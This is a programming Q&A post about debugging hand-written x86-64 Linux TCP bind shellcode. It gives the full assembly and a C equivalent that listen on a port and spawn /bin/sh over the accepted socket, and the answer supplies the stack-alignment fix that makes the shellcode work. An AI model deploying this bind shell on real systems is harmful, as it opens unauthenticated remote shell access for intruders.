# Why is accept() returning ERESTARTSYS?

Tags: linux, sockets, assembly, x86-64, shellcode

I am attempting to build a TCP bind shellcode modeled after a C writeup of the same thing.

Here is the asm :

```
global _start
section .text
_start:
  ; socket() call
  xor rax,rax
  add rax,41
  xor rdi,rdi
  add rdi,2
  xor rsi,rsi
  add rsi,1
  xor rdx,rdx
  syscall
  ; save file descriptor
  mov rbx,rax ; rbx is a 'safe' register, syscalls won't trample it

  ; build sockaddr_in struct - push in reverse needs to be a pointer
  xor rdx,rdx
  push rdx ; INADDR_ANY bind to any ip address
  push word 0xa1a ; port 6666
  push 0x2 ; AF_INET - required for ipv4

  ; build bind() call
  mov rdi,rbx ; socket file descriptor
  mov rsi,rsp ; pointer to struct
  xor rdx,rdx
  add rdx,16 ; size of struct
  xor rax,rax
  add rax,49
  syscall

  ; build listen() call
  xor rax,rax
  add rax,50
  mov rdx,rbx ; get the fd from the register we saved it to
  xor rsi,rsi
  add rsi,1 ; backlog size
  syscall

  ; build accept() call
  xor rax,rax
  add rax,43
  mov rdi,rbx ; safe register still has fd
  xor rsi,rsi ; used to be mov rsi,rsp ; nothing new pushed, still pointing at our struct
  xor rdx,rdx
  ; add rdx,16 ; still size of struct
  syscall
  mov r12,rax ; save fd for accepted socket, r12 is also a 'safe' register

  ; build dup2() calls
  ; these are needed to re-route stdout/err/in to our socket
  xor rax,rax
  add rax,33
  mov rdi,r12 ; get our open/accepted socket fd
  xor rsi,rsi ; 0 for stdin
  syscall
  xor rax,rax
  add rax,33
  mov rdi,r12
  xor rsi,rsi
  add rsi,1 ; stdout
  syscall
  xor rax,rax
  add rax,33
  mov rdi,r12
  xor rsi,rsi
  add rsi,2 ; stderr
  syscall

  ; spawn the shell
  jmp payload
  shell: db '/bin/sh'
  shell_term: db 1
  payload:
    xor rax,rax
    push rax
    mov rsi,rsp ;null pointer for argv
    mov rdx,rsp ;null pointer for envp
    lea rdi,[rel shell]
    dec byte [rel shell_term]
    add rax,59
    syscall
```

I have run the program through edb-debugger and it all proceeds normally but will hang at the `accept()` call. I can then pause the execution and it will put the ERESTARTSYS error in `rax`.
I have also tried a couple of different version of the call (commented in code). But they both return the same thing. I know from google that the error is something to do with recalling the fucntion, but to be honest I didn't really completely grasp what exactly it was trying to tell me.

The other odd thing is that I can inject the asm (I have a basic c file that does that) and it will run fine, but there are a few odd things I don't understand about its behavior. 1. The port is not what I set it to, it seems to be random (usually 30000+) 2. I can `nc` connect to the port locally (but not remotely) 3. The shell will spawn on the terminal that I ran the injection from but only after I hit enter on the `nc` connected terminal. This happens with or without a command entered but either way does not give any output on the `nc`connected terminal.

I have verified my `socket()`, `bind()`, `sockaddr_in` struct, and `listen()` portions via edb-debugger and reviewing the code. I feel that it is narrowed down to the `accept()` call. However, the fact that it is binding to the wrong port makes me suspect the `bind()` or the `sockaddr_in` as well. But they seem to work fine.

Here is the C code I am modeling my asm after:

```
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <stdio.h>

int main(void)
{
  int clientfd, sockfd;
  int port = 1234;
  struct sockaddr_in mysockaddr;
  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  mysockaddr.sin_family = AF_INET; //--> can be represented in  numeric  as 2
  mysockaddr.sin_port = htons(port);
  mysockaddr.sin_addr.s_addr = INADDR_ANY;// --> can be represented  in  numeric as 0 which means to bind to all interfaces
  // printf("size of sin_family: %d\n", (int)sizeof(mysockaddr.sin_family));
  // printf("size of sin_port: %d\n", (int)sizeof(mysockaddr.sin_port));
  // printf("size of sin_addr: %d\n", (int)sizeof(mysockaddr.sin_addr));
  // printf("size of sin_addr.s_addr: %d\n", (int)sizeof(mysockaddr.sin_addr.s_addr));
  // printf("size of struct: %d\n", (int)sizeof(mysockaddr));
  bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));
  listen(sockfd, 1);
  clientfd = accept(sockfd, NULL, NULL);
  dup2(clientfd, 0);
  dup2(clientfd, 1);
  dup2(clientfd, 2);
  char * const argv[] = {"sh",NULL, NULL};
  execve("/bin/sh", argv, NULL);
  return 0;
}
```

This code works exactly like I expect.

Comment: Since you break into the system call, it will return that error code so you can retry. That is normal. You are building the `sockaddr_in` struct wrong. Also you are misaligning the stack which might work but is bad practice.

Answer (score 0):

as @jester said the structure was being built with the wrong alignment. I made the following change and it works flawlessly.

```
  xor rdx,rdx
  push rdx
  push word 0xa1a
  push word 0x2 ; added 'word' to correct alignment
```